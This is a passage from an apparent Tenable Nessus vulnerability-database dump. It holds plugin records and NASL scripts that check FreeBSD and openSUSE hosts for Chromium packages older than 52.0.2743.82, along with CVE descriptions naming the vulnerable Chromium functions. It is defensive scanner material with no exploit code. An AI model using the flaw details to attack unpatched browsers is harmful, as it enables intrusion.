Credit\nto Rob Wu\n\n- [625945] Medium CVE-2016-5137: History sniffing with HSTS and CSP.\nCredit to Xiaoyin Liu\n\n- [629852] CVE-2016-1705: Various fixes from internal audits, fuzzing\nand other initiatives.\"\n );\n # https://googlechromereleases.blogspot.nl/2016/07/stable-channel-update.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3f4bd83a\"\n );\n # https://vuxml.freebsd.org/freebsd/6fae9fe1-5048-11e6-8aa7-3065ec8fd3ec.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e67e600e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-npapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-pulse\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<52.0.2743.82\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-npapi<52.0.2743.82\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-pulse<52.0.2743.82\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T14:17:01", "description": "Chromium was updated to 52.0.2743.82 to fix the following security issues (boo#989901) :\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n\n - CVE-2016-1707: URL spoofing on iOS\n\n - CVE-2016-1708: Use-after-free in Extensions\n\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n\n - CVE-2016-1710: Same-origin bypass in Blink\n\n - CVE-2016-1711: Same-origin bypass in Blink\n\n - CVE-2016-5127: Use-after-free in Blink\n\n - CVE-2016-5128: Same-origin bypass in V8\n\n - CVE-2016-5129: Memory corruption in V8\n\n - CVE-2016-5130: URL spoofing\n\n - CVE-2016-5131: Use-after-free in libxml\n\n - CVE-2016-5132: Limited same-origin bypass in Service Workers\n\n - CVE-2016-5133: Origin confusion in proxy authentication\n\n - CVE-2016-5134: URL leakage via PAC script\n\n - CVE-2016-5135: Content-Security-Policy bypass\n\n - CVE-2016-5136: Use after free in extensions\n\n - CVE-2016-5137: History 
sniffing with HSTS and CSP\n\n - CVE-2016-1705: Various fixes from internal audits, fuzzing and other initiatives", "cvss3": {}, "published": "2016-07-26T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2016-901)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "p-cpe:/a:novell:opensuse:chromium-desktop-gnome", "p-cpe:/a:novell:opensuse:chromium-desktop-kde", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-901.NASL", "href": "https://www.tenable.com/plugins/nessus/92551", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-901.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92551);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\", \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", 
\"CVE-2016-5135\", \"CVE-2016-5136\", \"CVE-2016-5137\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2016-901)\");\n script_summary(english:\"Check for the openSUSE-2016-901 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chromium was updated to 52.0.2743.82 to fix the following security\nissues (boo#989901) :\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n\n - CVE-2016-1707: URL spoofing on iOS\n\n - CVE-2016-1708: Use-after-free in Extensions\n\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n\n - CVE-2016-1710: Same-origin bypass in Blink\n\n - CVE-2016-1711: Same-origin bypass in Blink\n\n - CVE-2016-5127: Use-after-free in Blink\n\n - CVE-2016-5128: Same-origin bypass in V8\n\n - CVE-2016-5129: Memory corruption in V8\n\n - CVE-2016-5130: URL spoofing\n\n - CVE-2016-5131: Use-after-free in libxml\n\n - CVE-2016-5132: Limited same-origin bypass in Service\n Workers\n\n - CVE-2016-5133: Origin confusion in proxy authentication\n\n - CVE-2016-5134: URL leakage via PAC script\n\n - CVE-2016-5135: Content-Security-Policy bypass\n\n - CVE-2016-5136: Use after free in extensions\n\n - CVE-2016-5137: History sniffing with HSTS and CSP\n\n - CVE-2016-1705: Various fixes from internal audits,\n fuzzing and other initiatives\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=989901\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-kde\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) 
audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-52.0.2743.82-111.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-52.0.2743.82-111.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-gnome-52.0.2743.82-111.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-kde-52.0.2743.82-111.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-52.0.2743.82-111.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"chromedriver-debuginfo-52.0.2743.82-111.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"chromium-debuginfo-52.0.2743.82-111.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"chromium-debugsource-52.0.2743.82-111.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"chromium-ffmpegsumo-debuginfo-52.0.2743.82-111.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromium / chromium-desktop-gnome / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:27:10", "description": "The specific version of Chrome that the system is running is reportedly affected by the following vulnerabilities:\n\n- Google Chrome contains a flaw in PPAPI that is triggered when handling certain messages not sent by the browser in the plugin broker process. This may allow a context-dependent attacker to bypass the sandbox. 
(CVE-2016-1706)\n\n- Google Chrome for iOS contains a flaw in web/web_state/ui/crw_web_controller.mm that is triggered when handling invalid URLs. This may allow a context-dependent attacker to conduct URL spoofing attacks. (CVE-2016-1707)\n\n- Google Chrome contains a use-after-free error related to extensions that may allow a context-dependent attacker to dereference already freed memory and potentially execute arbitrary code.\n (CVE-2016-1708)\n\n- Google sfntly contains an array indexing error in the ByteArray::Get() function in data/byte_array.cc that is triggered as user-supplied input is not properly validated. This may allow a context-dependent attacker to cause a heap-based buffer overflow, crashing a process linked against the library or potentially allowing the execution of arbitrary code. (CVE-2016-1709)\n\n- Google Chrome contains a flaw in web/ChromeClientImpl.cpp that is triggered when handling creation of new windows by deferred frames. This may allow a context-dependent attacker to bypass the same-origin policy. (CVE-2016-1710)\n\n- Google Chrome contains a flaw in core/loader/FrameLoader.cpp that is triggered when handling frame navigations during DocumentLoader detach. This may allow a context-dependent attacker to bypass the same-origin policy. (CVE-2016-1711)\n\n- Google Chrome contains a use-after-free error in the previousLinePosition() function in core/editing/VisibleUnits.cpp. This may allow a context-dependent attacker to dereference already freed memory and potentially execute arbitrary code. (CVE-2016-5127)\n\n- Google V8 contains an unspecified flaw which may allow a context-dependent attacker to bypass the same-origin policy. No further details have been provided by the vendor. (CVE-2016-5128)\n\n- Google V8 contains a flaw that is triggered as user-supplied input is not properly validated. 
This may allow a context-dependent attacker to corrupt memory and cause a denial of service in a process linked against the library or potentially execute arbitrary code. (CVE-2016-5129)\n\n- Google Chrome contains a flaw in the HistoryController::UpdateForCommit() function in content/renderer/history_controller.cc. The issue is triggered when handling two forward navigations that compete in different frames. This may allow a context-dependent attacker to perform URL spoofing attacks. (CVE-2016-5130)\n\n- Libxml2 contains a use-after-free error in the xmlXPtrRangeToFunction() function in xpointer.c. This may allow a context-dependent attacker to dereference already freed memory and potentially execute arbitrary code. (CVE-2016-5131)\n\n- Google Chrome contains a flaw related to Service Workers that is triggered when handling subframes of an insecure context. This may allow a context-dependent attacker to perform a limited bypass of the same-origin policy. (CVE-2016-5132)\n\n- Google Chrome contains a flaw related to proxy authentication that is triggered when handling origins. This may allow a context-dependent attacker to spoof the proxy server origin. (CVE-2016-5133)\n\n- Google Chrome contains a flaw that is triggered as https:// URLs are not properly sanitized before being sent to PAC scripts. This may allow a context-dependent attacker to leak URLs. (CVE-2016-5134)\n\n- Google Chrome contains a flaw in html/parser/HTMLPreloadScanner.cpp related to the handling of referrer policies. This may allow a context-dependent attacker to bypass the content security policy (CSP). (CVE-2016-5135)\n\n- Google Chrome contains a use-after-free error in extensions/renderer/user_script_injector.cc that is triggered when handling UserScript pointers. This may allow a malicious extension to dereference already freed memory and potentially execute arbitrary code with elevated privileges. 
(CVE-2016-5136)\n\n- Google Chrome contains a flaw in the CSPSource::portMatches() function in frame/csp/CSPSource.cpp related to HSTS and CSP when handling HTTP vs HTTPS ports in source expressions. This may allow a context-dependent attacker to disclose browsing history information. (CVE-2016-5137)\n\n- Google Chrome contains a flaw in the LayoutBox::removeFloatingOrPositionedChildFromBlockLists() function in core/layout/LayoutBox.cpp that is triggered when handling LayoutView floats. This may allow a context-dependent attacker to potentially execute arbitrary code. (CVE-2016-1705)\n\n- Google Chrome contains a flaw in the Resource::canUseCacheValidator() function in core/fetch/Resource.cpp that is triggered when revalidating Resource with redirects. This may allow a context-dependent attacker to have an unspecified impact. (CVE-2016-1705)\n\n- Google Chrome contains a flaw in the Resource::willFollowRedirect() function in core/fetch/Resource.cpp that is triggered when handling redirect responses while revalidating resources. This may allow a context-dependent attacker to have an unspecified impact. (CVE-2016-1705)\n\n- Google Chrome contains a flaw in net/url_request/sdch_dictionary_fetcher.cc that is triggered when handling dictionary requests failing after receiving data. This may allow a context-dependent attacker to have an unspecified impact. (CVE-2016-1705)\n\n- Google Chrome contains a flaw in the ShapeResultSpacing::computeSpacing() function in platform/fonts/shaping/ShapeResultSpacing.cpp that is triggered as certain input is not properly validated. This may allow a context-dependent attacker to potentially execute arbitrary code. (CVE-2016-1705)\n\n- Google Chrome contains a flaw in the Channel::Message::Deserialize() function in mojo/edk/system/channel.cc that is triggered when handling header sizes in channel messages. This may allow a context-dependent attacker to potentially execute arbitrary code. 
(CVE-2016-1705)\n\n- Google Chrome contains an unspecified flaw in the Font::individualCharacterRanges() function in platform/fonts/Font.cpp, which may allow a context-dependent attacker to have an unspecified impact. (CVE-2016-1705)\n\n- Google WebRTC contains an out-of-bounds read flaw in the WebRtcIsacfix_PitchFilter() and WebRtcIsacfix_PitchFilterGains() functions in modules/audio_coding/codecs/isac/fix/source/pitch_filter.c that may allow a context-dependent attacker to crash a process linked against the library or potentially disclose memory contents. (CVE-2016-1705)\n\n- Google Chrome contains a flaw in org/chromium/chrome/browser/toolbar/CustomTabToolbarAnimationDelegate.java that is due to the program failing to properly load security icons on custom HTTP connection tabs. This may allow a context-dependent attacker to spoof valid icons. (CVE-2016-1705)\n\n- Google Skia contains an integer overflow condition in the SkLinearGradient::LinearGradientContext::shade4_dx_clamp() function in effects/gradients/SkLinearGradient.cpp. The issue is triggered as user-supplied input is not properly validated. This may allow a context-dependent attacker to have an unspecified impact. (CVE-2016-1705)\n\n- libvpx contains an invalid read flaw in the setup_frame_size_with_refs() function in vp9/decoder/vp9_decodeframe.c that may allow a context-dependent attacker to crash a process linked against the library or potentially disclose memory contents.\n\n- Google Chrome contains an unspecified flaw in extensions that is triggered during the handling of NativeMessaging IDs. This may allow a context-dependent attacker to have an unspecified impact. (CVE-2016-1705)\n\n- Google Chrome contains an out-of-bounds read flaw in the HTMLMenuItemElement::defaultEventHandler() function in core/html/HTMLMenuItemElement.cpp that may allow a context-dependent attacker to potentially disclose memory contents. 
(CVE-2016-1705)\n\n- Google Chrome contains an unspecified flaw in the GURL::ReplaceComponents() function in url/gurl.cc that is triggered during inner URL creation. This may allow a context-dependent attacker to have an unspecified impact. No further details have been provided. (CVE-2016-1705)\n\n- Google V8 contains an unspecified flaw that may allow a context-dependent attacker to have an unspecified impact. No further details have been provided by the vendor. (CVE-2016-1705)", "cvss3": {}, "published": "2016-09-06T00:00:00", "type": "nessus", "title": "Chrome < 52.0.2743.82 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2016-09-06T00:00:00", "cpe": [], "id": "802027.PRM", "href": "https://www.tenable.com/plugins/lce/802027", "sourceData": "Binary data 802027.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:52", "description": "Chromium was updated to 52.0.2743.82 to fix the following security issues (boo#989901) :\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n\n - CVE-2016-1707: URL spoofing on iOS\n\n - CVE-2016-1708: Use-after-free in Extensions\n\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n\n - CVE-2016-1710: Same-origin bypass in Blink\n\n - CVE-2016-1711: Same-origin bypass in Blink\n\n - CVE-2016-5127: Use-after-free in Blink\n\n - CVE-2016-5128: Same-origin bypass in V8\n\n - CVE-2016-5129: Memory corruption in V8\n\n - CVE-2016-5130: URL spoofing\n\n - CVE-2016-5131: Use-after-free in libxml\n\n - CVE-2016-5132: Limited same-origin bypass in Service Workers\n\n - CVE-2016-5133: Origin confusion in proxy authentication\n\n - CVE-2016-5134: URL leakage via PAC script\n\n 
- CVE-2016-5135: Content-Security-Policy bypass\n\n - CVE-2016-5136: Use after free in extensions\n\n - CVE-2016-5137: History sniffing with HSTS and CSP\n\n - CVE-2016-1705: Various fixes from internal audits, fuzzing and other initiatives", "cvss3": {}, "published": "2016-08-01T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2016-919)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "p-cpe:/a:novell:opensuse:chromium-desktop-gnome", "p-cpe:/a:novell:opensuse:chromium-desktop-kde", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2016-919.NASL", "href": "https://www.tenable.com/plugins/nessus/92655", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-919.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92655);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\", \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", 
\"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5136\", \"CVE-2016-5137\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2016-919)\");\n script_summary(english:\"Check for the openSUSE-2016-919 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chromium was updated to 52.0.2743.82 to fix the following security\nissues (boo#989901) :\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n\n - CVE-2016-1707: URL spoofing on iOS\n\n - CVE-2016-1708: Use-after-free in Extensions\n\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n\n - CVE-2016-1710: Same-origin bypass in Blink\n\n - CVE-2016-1711: Same-origin bypass in Blink\n\n - CVE-2016-5127: Use-after-free in Blink\n\n - CVE-2016-5128: Same-origin bypass in V8\n\n - CVE-2016-5129: Memory corruption in V8\n\n - CVE-2016-5130: URL spoofing\n\n - CVE-2016-5131: Use-after-free in libxml\n\n - CVE-2016-5132: Limited same-origin bypass in Service\n Workers\n\n - CVE-2016-5133: Origin confusion in proxy authentication\n\n - CVE-2016-5134: URL leakage via PAC script\n\n - CVE-2016-5135: Content-Security-Policy bypass\n\n - CVE-2016-5136: Use after free in extensions\n\n - CVE-2016-5137: History sniffing with HSTS and CSP\n\n - CVE-2016-1705: Various fixes from internal audits,\n fuzzing and other initiatives\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=989901\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-kde\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif 
(!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-52.0.2743.82-150.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-debuginfo-52.0.2743.82-150.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-52.0.2743.82-150.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debuginfo-52.0.2743.82-150.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debugsource-52.0.2743.82-150.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-desktop-gnome-52.0.2743.82-150.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-desktop-kde-52.0.2743.82-150.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-52.0.2743.82-150.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-debuginfo-52.0.2743.82-150.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:50", "description": "Chromium was updated to 52.0.2743.82 to fix the following security issues (boo#989901) :\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n\n - CVE-2016-1707: URL spoofing on iOS\n\n - CVE-2016-1708: Use-after-free in Extensions\n\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n\n - CVE-2016-1710: Same-origin bypass in Blink\n\n - CVE-2016-1711: Same-origin bypass in Blink\n\n - 
